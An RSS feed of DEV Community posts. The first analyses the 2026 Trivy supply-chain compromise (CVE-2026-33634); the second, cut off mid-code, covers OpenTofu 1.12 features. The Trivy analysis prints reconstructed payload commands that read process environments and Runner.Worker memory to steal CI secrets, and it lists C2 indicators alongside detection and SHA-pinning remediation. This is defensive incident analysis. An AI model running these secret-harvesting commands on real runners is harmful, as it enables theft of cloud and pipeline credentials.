<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: daniel jeong</title>
    <description>The latest articles on DEV Community by daniel jeong (@x4nent).</description>
    <link>https://dev.to/x4nent</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3847714%2Fa00caf55-e9ba-4ee1-91a9-ac154d40925d.jpeg</url>
      <title>DEV Community: daniel jeong</title>
      <link>https://dev.to/x4nent</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/x4nent"/>
    <language>en</language>
    <item>
      <title>Inside the Trivy Supply Chain Compromise (CVE-2026-33634): 76 Hijacked Tags, Runner.Worker Memory Secret Theft &amp; SHA Pinning</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Wed, 03 Jun 2026 23:40:21 +0000</pubDate>
      <link>https://dev.to/x4nent/inside-the-trivy-supply-chain-compromise-cve-2026-33634-76-hijacked-tags-runnerworker-memory-l1j</link>
      <guid>https://dev.to/x4nent/inside-the-trivy-supply-chain-compromise-cve-2026-33634-76-hijacked-tags-runnerworker-memory-l1j</guid>
      <description>&lt;p&gt;What happens when the security scanner meant to protect your pipeline turns into the malware that steals your secrets? On March 19, 2026, that is exactly what happened to &lt;strong&gt;Trivy&lt;/strong&gt; (aquasecurity). Trivy is the most widely adopted open-source vulnerability scanner in the cloud-native ecosystem, embedded in thousands of CI/CD pipelines as the &lt;code&gt;aquasecurity/trivy-action&lt;/code&gt; GitHub Action — and &lt;strong&gt;by design it has access to pipeline secrets&lt;/strong&gt;. Compromise a tool like that, and the attacker doesn't just get code: they get cloud credentials, SSH keys, and Kubernetes tokens — everything the pipeline touches.&lt;/p&gt;

&lt;p&gt;This post breaks down the official advisory &lt;strong&gt;GHSA-69fq-xp46-6x23&lt;/strong&gt; (CVE-2026-33634, Critical) as the primary source: what happened, how the payload worked, and the SHA-pinning-based remediation ManoIT applied to its internal pipelines.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj1duzx65aep8oxilg2cb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj1duzx65aep8oxilg2cb.png" alt="Trivy supply chain attack chain" width="799" height="373"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. What Happened — When a Security Tool Becomes the Weapon
&lt;/h2&gt;

&lt;p&gt;This was not a single poisoned package. It was a &lt;strong&gt;multi-channel strike that hit GitHub Actions, release binaries, Docker Hub images, and package repositories simultaneously&lt;/strong&gt;. The threat actor — &lt;strong&gt;TeamPCP&lt;/strong&gt; (the payload calls itself "TeamPCP Cloud Stealer") — force-pushed &lt;strong&gt;76 of 77 tags&lt;/strong&gt; in &lt;code&gt;aquasecurity/trivy-action&lt;/code&gt; and &lt;strong&gt;all 7 tags&lt;/strong&gt; in &lt;code&gt;aquasecurity/setup-trivy&lt;/code&gt; to malicious commits at 17:43 UTC on March 19. Less than an hour later, at 18:22 UTC, a forged &lt;strong&gt;v0.69.4&lt;/strong&gt; binary was distributed across GitHub Releases, GHCR, Docker Hub, ECR Public, deb/rpm, and &lt;code&gt;get.trivy.dev&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;It didn't stop there. Three days later, on March 22, the attacker used &lt;strong&gt;separately stolen Docker Hub credentials&lt;/strong&gt; to push malicious &lt;code&gt;v0.69.5&lt;/code&gt;, &lt;code&gt;v0.69.6&lt;/code&gt;, and &lt;code&gt;latest&lt;/code&gt; images, bypassing GitHub-based controls entirely. The same day, using a service account token (&lt;code&gt;Argon-DevOps-Mgt&lt;/code&gt;) bridging two GitHub orgs, they defaced &lt;strong&gt;all 44 repositories&lt;/strong&gt; in Aqua Security's &lt;code&gt;aquasec-com&lt;/code&gt; org with a &lt;code&gt;tpcp-docs-&lt;/code&gt; prefix and exposed proprietary source.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time (UTC)&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Channel&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Late Feb – 3/1&lt;/td&gt;
&lt;td&gt;Initial breach, partial (non-atomic) credential rotation&lt;/td&gt;
&lt;td&gt;Release infra&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3/19 17:43&lt;/td&gt;
&lt;td&gt;trivy-action 76 + setup-trivy 7 tags force-pushed&lt;/td&gt;
&lt;td&gt;GitHub Actions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3/19 18:22&lt;/td&gt;
&lt;td&gt;Forged v0.69.4 binary distributed (~3h exposure)&lt;/td&gt;
&lt;td&gt;All channels&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3/20 05:40&lt;/td&gt;
&lt;td&gt;trivy-action tags restored (~12h exposure closed)&lt;/td&gt;
&lt;td&gt;GitHub Actions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3/22&lt;/td&gt;
&lt;td&gt;v0.69.5/v0.69.6/latest images (~10h), 44 repos defaced&lt;/td&gt;
&lt;td&gt;Docker Hub&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  2. Root Cause — Non-Atomic Credential Rotation
&lt;/h2&gt;

&lt;p&gt;The March incident didn't come out of nowhere — it was a &lt;strong&gt;continuation of a supply chain attack that began in late February 2026&lt;/strong&gt;. After the initial disclosure on March 1, credential rotation was performed but &lt;strong&gt;was not atomic&lt;/strong&gt; — not all credentials were revoked simultaneously. While rotation dragged on over several days, the attacker used still-valid tokens to &lt;strong&gt;re-exfiltrate the newly rotated secrets&lt;/strong&gt;, retaining the residual access that enabled the March 19 attack.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ Caution: In incident response, "we rotated the credentials" is not sufficient. The &lt;strong&gt;window between revocation and reissue&lt;/strong&gt; becomes the channel for the second breach. Rotation must be atomic — bulk-invalidate old credentials and issue new ones as a single unit of work.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  3. Breaking Down the Attack
&lt;/h2&gt;

&lt;h3&gt;
  
  
  3.1 trivy-action Tag Hijacking — &lt;code&gt;@v0.34.0&lt;/code&gt; Is a Pointer, Not a Contract
&lt;/h3&gt;

&lt;p&gt;The core of this attack abused &lt;strong&gt;two by-design properties&lt;/strong&gt; of Git and GitHub: &lt;strong&gt;mutable tags&lt;/strong&gt; and &lt;strong&gt;self-declared commit identity&lt;/strong&gt;. By default, tags are not immutable references. Anyone with push access can repoint an existing tag to an entirely different commit. The attacker force-pushed 76 tags to malicious commits and injected the payload into &lt;code&gt;entrypoint.sh&lt;/code&gt; so it &lt;strong&gt;ran immediately before the legitimate Trivy scan&lt;/strong&gt;. Pipelines looked normal while the stealer ran silently underneath. The imposter commits spoofed maintainer identities, but GitHub flagged them with &lt;em&gt;"This commit does not belong to any branch on this repository."&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 Forging the v0.69.4 Binary — goreleaser &lt;code&gt;--skip=validate&lt;/code&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1) Push commit 1885610c
   -&amp;gt; swap actions/checkout reference to imposter commit 70379aad
   -&amp;gt; composite action that downloads malicious Go source from a typosquatted domain
2) Add --skip=validate to goreleaser -&amp;gt; disable binary integrity validation
3) Tag that commit as v0.69.4 -&amp;gt; trigger the release pipeline
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A single line that turns off build validation (&lt;code&gt;--skip=validate&lt;/code&gt;) nullified the entire integrity guarantee.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.3 The Payload — Reading Secrets Straight Out of Runner.Worker Memory
&lt;/h3&gt;

&lt;p&gt;The most dangerous technique &lt;strong&gt;bypassed GitHub Actions' secret masking&lt;/strong&gt; head-on.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Payload behavior (reconstructed)&lt;/span&gt;
&lt;span class="c"&gt;# 1) Scan environment variables of all runner processes&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; /proc/&lt;span class="k"&gt;*&lt;/span&gt;/environ          &lt;span class="c"&gt;# first-pass collection of SSH keys / env secrets&lt;/span&gt;

&lt;span class="c"&gt;# 2) Key technique: read the Runner.Worker process memory directly&lt;/span&gt;
&lt;span class="c"&gt;#    A base64-encoded Python payload targets values marked isSecret:true&lt;/span&gt;
&lt;span class="c"&gt;#    -&amp;gt; secrets that show as *** in logs are extracted in plaintext from memory&lt;/span&gt;
python3 &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'... read /proc/&amp;lt;worker_pid&amp;gt;/mem ...'&lt;/span&gt;

&lt;span class="c"&gt;# 3) Sweep 50+ paths: AWS/GCP/Azure tokens, k8s configs,&lt;/span&gt;
&lt;span class="c"&gt;#    Docker configs, Terraform state, Git credentials, wallets, shell history&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Collected data was &lt;strong&gt;AES-256-CBC + RSA-4096 hybrid encrypted&lt;/strong&gt; and exfiltrated via HTTPS POST to the typosquatted C2 domain &lt;code&gt;scan[.]aquasecurtiy[.]org&lt;/code&gt; (mimicking Aqua's name, &lt;code&gt;45.148.10.212&lt;/code&gt; in Amsterdam). If the C2 was unreachable and a GitHub PAT was present, the malware &lt;strong&gt;created a public &lt;code&gt;tpcp-docs&lt;/code&gt; repository on the victim's account and uploaded the stolen data as release assets&lt;/strong&gt; — turning GitHub itself into the exfiltration channel.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Affected vs. Safe Versions
&lt;/h2&gt;

&lt;p&gt;The lesson is blunt: &lt;strong&gt;the safe reference is a full commit SHA, not a version tag&lt;/strong&gt;. Why the safe versions are safe is telling too — v0.69.3 and trivy-action v0.35.0 were protected by &lt;strong&gt;GitHub Immutable Releases&lt;/strong&gt; (enabled 3/3 and 3/4, before the attack).&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Affected&lt;/th&gt;
&lt;th&gt;Exposure&lt;/th&gt;
&lt;th&gt;Safe&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;trivy binary&lt;/td&gt;
&lt;td&gt;v0.69.4&lt;/td&gt;
&lt;td&gt;~3h (3/19)&lt;/td&gt;
&lt;td&gt;v0.69.3 or earlier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;trivy (Docker Hub)&lt;/td&gt;
&lt;td&gt;v0.69.5, v0.69.6, latest&lt;/td&gt;
&lt;td&gt;~10h (3/22–24)&lt;/td&gt;
&lt;td&gt;v0.69.3 or earlier (digest-pinned)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;trivy-action&lt;/td&gt;
&lt;td&gt;tags 0.0.1–0.34.2 (76)&lt;/td&gt;
&lt;td&gt;~12h (3/19–20)&lt;/td&gt;
&lt;td&gt;v0.35.0 (&lt;code&gt;57a97c7&lt;/code&gt;) or SHA-pinned&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;setup-trivy&lt;/td&gt;
&lt;td&gt;all releases&lt;/td&gt;
&lt;td&gt;~4h (3/19)&lt;/td&gt;
&lt;td&gt;v0.2.6 (&lt;code&gt;3fb12ec&lt;/code&gt;) or SHA-pinned&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ Caution: A malicious &lt;code&gt;v0.70.0&lt;/code&gt; push was stopped just before the tag landed, so treat any v0.70.0 reference in logs as suspicious. Also, &lt;code&gt;mirror.gcr.io&lt;/code&gt; may still serve cached malicious images — reference by &lt;strong&gt;digest (&lt;a class="mentioned-user" href="https://dev.to/sha256"&gt;@sha256&lt;/a&gt;:...)&lt;/strong&gt;. The force-pushed old tags (&lt;code&gt;0.0.1&lt;/code&gt;–&lt;code&gt;0.34.2&lt;/code&gt;) hardened into immutable releases and can't be recreated under the same names; they were re-published with a &lt;code&gt;v&lt;/code&gt; prefix.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  5. Detection &amp;amp; Response Playbook
&lt;/h2&gt;

&lt;p&gt;You need a fast answer to "were we exposed, and if so, what do we rotate?" Treat &lt;strong&gt;every secret accessible to a workflow that ran a compromised version&lt;/strong&gt; during the exposure windows as compromised.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) Fallback exfil trace -- search org for tpcp-docs repos (presence = successful exfil)&lt;/span&gt;
gh repo list &amp;lt;ORG&amp;gt; &lt;span class="nt"&gt;--limit&lt;/span&gt; 1000 &lt;span class="nt"&gt;--json&lt;/span&gt; name &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.[].name'&lt;/span&gt; | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'tpcp-docs'&lt;/span&gt;

&lt;span class="c"&gt;# 2) Check 3/19-20 workflow run logs for trivy-action tag references&lt;/span&gt;
gh run list &lt;span class="nt"&gt;--repo&lt;/span&gt; &amp;lt;ORG&amp;gt;/&amp;lt;REPO&amp;gt; &lt;span class="nt"&gt;--created&lt;/span&gt; 2026-03-19..2026-03-20 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--json&lt;/span&gt; databaseId,workflowName,createdAt

&lt;span class="c"&gt;# 3) Block C2 indicators at the network level + review historical connections&lt;/span&gt;
&lt;span class="c"&gt;#    domain: scan[.]aquasecurtiy[.]org   IP: 45.148.10.212&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then &lt;strong&gt;rotate all potentially exposed secrets atomically&lt;/strong&gt;: GitHub tokens, cloud provider credentials, registry tokens, SSH keys, DB passwords. Audit for secondary compromise — unauthorized repos, unexpected workflow runs, infrastructure changes.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. The Real Fix — SHA Pinning and Immutable Releases
&lt;/h2&gt;

&lt;p&gt;The single most important lesson: &lt;strong&gt;mutable tags are a liability.&lt;/strong&gt; Pin every third-party Action to a &lt;strong&gt;full commit SHA&lt;/strong&gt;, and even if a tag is repointed via force-push, your workflow only runs the commit you intended.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# BAD -- mutable tag (can be force-pushed at any time)&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aquasecurity/trivy-action@0.34.0&lt;/span&gt;

&lt;span class="c1"&gt;# GOOD -- full commit SHA pin + comment for version readability&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aquasecurity/trivy-action@57a97c7&lt;/span&gt;  &lt;span class="c1"&gt;# v0.35.0&lt;/span&gt;
  &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;scan-type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;fs'&lt;/span&gt;
    &lt;span class="na"&gt;severity&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;CRITICAL,HIGH'&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aquasecurity/setup-trivy@3fb12ec&lt;/span&gt;    &lt;span class="c1"&gt;# v0.2.6&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Verify binaries and images with &lt;strong&gt;sigstore signatures&lt;/strong&gt;, confirming both integrity and signing time (that it was signed before the 3/19 attack).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# sigstore verification for the binary&lt;/span&gt;
cosign verify-blob &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="s1"&gt;'https://github\.com/aquasecurity/'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; &lt;span class="s1"&gt;'https://token.actions.githubusercontent.com'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--bundle&lt;/span&gt; trivy_0.69.2_Linux-64bit.tar.gz.sigstore.json &lt;span class="se"&gt;\&lt;/span&gt;
  trivy_0.69.2_Linux-64bit.tar.gz
&lt;span class="c"&gt;# Verified OK  -&amp;gt; additionally confirm the signing time predates the 3/19 attack&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Defense layer&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Attack surface closed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Reference immutability&lt;/td&gt;
&lt;td&gt;Pin Actions to full SHA, images to digest&lt;/td&gt;
&lt;td&gt;Tag hijacking / force-push&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Integrity verification&lt;/td&gt;
&lt;td&gt;sigstore/cosign signature + signing time check&lt;/td&gt;
&lt;td&gt;Forged binaries / images&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Release protection&lt;/td&gt;
&lt;td&gt;Enable GitHub Immutable Releases&lt;/td&gt;
&lt;td&gt;Release asset rewriting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential hygiene&lt;/td&gt;
&lt;td&gt;Atomic rotation, least-privilege tokens, short-lived OIDC&lt;/td&gt;
&lt;td&gt;Residual access / second breach&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runner monitoring&lt;/td&gt;
&lt;td&gt;Watch CI runners like production hosts&lt;/td&gt;
&lt;td&gt;/proc/mem secret theft&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  7. How ManoIT Responded Internally
&lt;/h2&gt;

&lt;p&gt;ManoIT used this incident to roll the following into its GitOps/CI pipelines in stages. First, &lt;strong&gt;pin every third-party GitHub Action to a full SHA&lt;/strong&gt;, with Renovate/Dependabot raising update PRs at SHA granularity. Second, &lt;strong&gt;digest-pin&lt;/strong&gt; container base and scanner images, and exclude cache mirrors like &lt;code&gt;mirror.gcr.io&lt;/code&gt; from the trust boundary. Third, migrate CI secrets from static PATs to &lt;strong&gt;OIDC-based short-lived tokens&lt;/strong&gt; so that even if stolen, their lifetime is short. Fourth, write &lt;strong&gt;"atomic rotation"&lt;/strong&gt; explicitly into the incident runbook — coupling revoke and reissue into a single operation to eliminate the time window. Fifth, attach runtime security (eBPF-based process/network monitoring) to CI runner nodes to detect &lt;code&gt;/proc/&amp;lt;pid&amp;gt;/mem&lt;/code&gt; access and anomalous outbound traffic.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. Closing — Your Security Tools Are Part of Your Attack Surface
&lt;/h2&gt;

&lt;p&gt;The message of the Trivy compromise is clear: &lt;strong&gt;your security tools are part of your attack surface.&lt;/strong&gt; Trivy holds privileged access to CI secrets by design, and that very privilege makes it an ideal target. Single-layer defense doesn't survive modern multi-channel, multi-stage supply chain attacks — only defense in depth, stacking reference immutability, integrity verification, credential hygiene, and runner monitoring, holds up. The project has since recovered its normal release cadence, shipping &lt;strong&gt;v0.71.0&lt;/strong&gt; (2026-06-01) as the latest stable, and the core lessons — SHA pinning and Immutable Releases — are now standard practice well beyond Trivy. The point isn't to distrust your tools — it's to &lt;strong&gt;pin your references immutably and prove their integrity.&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Indicator (IoC)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;C2 domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;scan[.]aquasecurtiy[.]org&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 IP&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;45.148.10.212&lt;/code&gt; (Amsterdam)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rogue trivy commit&lt;/td&gt;
&lt;td&gt;&lt;code&gt;1885610c&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Malicious checkout commit&lt;/td&gt;
&lt;td&gt;&lt;code&gt;70379aad&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compromised setup-trivy commit&lt;/td&gt;
&lt;td&gt;&lt;code&gt;8afa9b9f9183b4e00c46e2b82d34047e3c177bd0&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exfil artifact&lt;/td&gt;
&lt;td&gt;public repos named &lt;code&gt;tpcp-docs&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Commit warning&lt;/td&gt;
&lt;td&gt;&lt;em&gt;"This commit does not belong to any branch on this repository"&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;p&gt;&lt;em&gt;Originally published on the &lt;a href="https://www.manoit.co.kr/forum/view/1483847" rel="noopener noreferrer"&gt;ManoIT blog&lt;/a&gt;. Cross-verified against the official advisory GHSA-69fq-xp46-6x23 / CVE-2026-33634. Version and IoC data are current as of 2026-06-04; re-check the official advisory before acting. · AI writing assist: Claude (Anthropic)&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1483847" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>github</category>
      <category>kubernetes</category>
    </item>
    <item>
      <title>OpenTofu 1.12.0: Dynamic prevent_destroy, destroy=false, Identity Import &amp; Provider Checksum Automation</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Wed, 03 Jun 2026 00:55:24 +0000</pubDate>
      <link>https://dev.to/x4nent/opentofu-1120-dynamic-preventdestroy-destroyfalse-identity-import-provider-checksum-21h3</link>
      <guid>https://dev.to/x4nent/opentofu-1120-dynamic-preventdestroy-destroyfalse-identity-import-provider-checksum-21h3</guid>
      <description>&lt;p&gt;Anyone who has run Infrastructure as Code (IaC) in production for a while knows it: the hard part isn't &lt;em&gt;creating&lt;/em&gt; a resource — it's protecting that resource differently per environment, detaching it safely, importing existing ones accurately, and not wrestling with lock files in CI.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenTofu 1.12.0&lt;/strong&gt; (released May 14, 2026) takes direct aim at exactly these operational pains. Forked from Terraform after HashiCorp's 2023 BSL license change, OpenTofu added OCI registry support and native S3 locking in 1.10, ephemeral values and the &lt;code&gt;enabled&lt;/code&gt; meta-argument in 1.11, and has now diverged into &lt;strong&gt;a mature IaC engine on its own track&lt;/strong&gt; rather than "a fork chasing Terraform." This article breaks down five of 1.12's key features from an operations and architecture angle, then lays out how ManoIT rolled them into our internal multi-cloud IaC.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why OpenTofu 1.12 Now — From Fork to Its Own Track
&lt;/h2&gt;

&lt;p&gt;Some context first. When IBM acquired HashiCorp in December 2024, enterprise uncertainty around the BSL license grew, accelerating OpenTofu evaluation. As of April 2026, roughly &lt;strong&gt;12% of IaC practitioners have adopted&lt;/strong&gt; OpenTofu, with another 27% planning to evaluate or expand it, while organizations like Boeing, Capital One, and AMD run it in production. Many teams run both — Terraform for legacy, OpenTofu for greenfield.&lt;/p&gt;

&lt;p&gt;The important shift is that the two tools are &lt;strong&gt;no longer two versions of the same product&lt;/strong&gt;. OpenTofu has diverged toward native state encryption, provider-defined functions, and a faster release cadence; Terraform has gone toward AI-assisted features and deeper HCP integration. 1.12 sits in the middle of that divergence as a signal of operational maturity: "lifecycle control made dynamic, imports made accurate, lock files made automatic."&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Released&lt;/th&gt;
&lt;th&gt;Theme&lt;/th&gt;
&lt;th&gt;Headline&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1.10.0&lt;/td&gt;
&lt;td&gt;2025-06&lt;/td&gt;
&lt;td&gt;Deployment / security base&lt;/td&gt;
&lt;td&gt;OCI registry, native S3 lock, external key providers (state encryption)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.11&lt;/td&gt;
&lt;td&gt;H2 2025&lt;/td&gt;
&lt;td&gt;Expressiveness&lt;/td&gt;
&lt;td&gt;Ephemeral values, &lt;code&gt;enabled&lt;/code&gt; meta-argument, stronger moved/removed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.12.0&lt;/td&gt;
&lt;td&gt;2026-05-14&lt;/td&gt;
&lt;td&gt;Operational maturity&lt;/td&gt;
&lt;td&gt;Dynamic prevent_destroy, destroy=false, identity import, checksum automation, -json-into&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  2. Dynamic prevent_destroy — Per-Environment Delete Protection via Variables
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;prevent_destroy&lt;/code&gt; is a lifecycle argument that tells OpenTofu to error out if a plan would destroy a given object. It's commonly used for objects whose deletion would cause a major outage, or whose recreation requires manual work outside OpenTofu (like restoring a backup). The problem: until now this value was a &lt;strong&gt;static decision hard-coded into configuration&lt;/strong&gt;. If you share a module across prod and dev — wanting the prod database extremely hard to delete but the dev one easy to replace — a static value left you stuck.&lt;/p&gt;

&lt;p&gt;1.12.0 lets &lt;code&gt;prevent_destroy&lt;/code&gt; be &lt;strong&gt;defined dynamically in terms of other values within the same module&lt;/strong&gt; (such as input variables). It's the first lifecycle argument to be made dynamic, with more planned (umbrella issue #1329).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"prevent_destroy_database"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# Protected by default. Turn off via the dev module block.&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

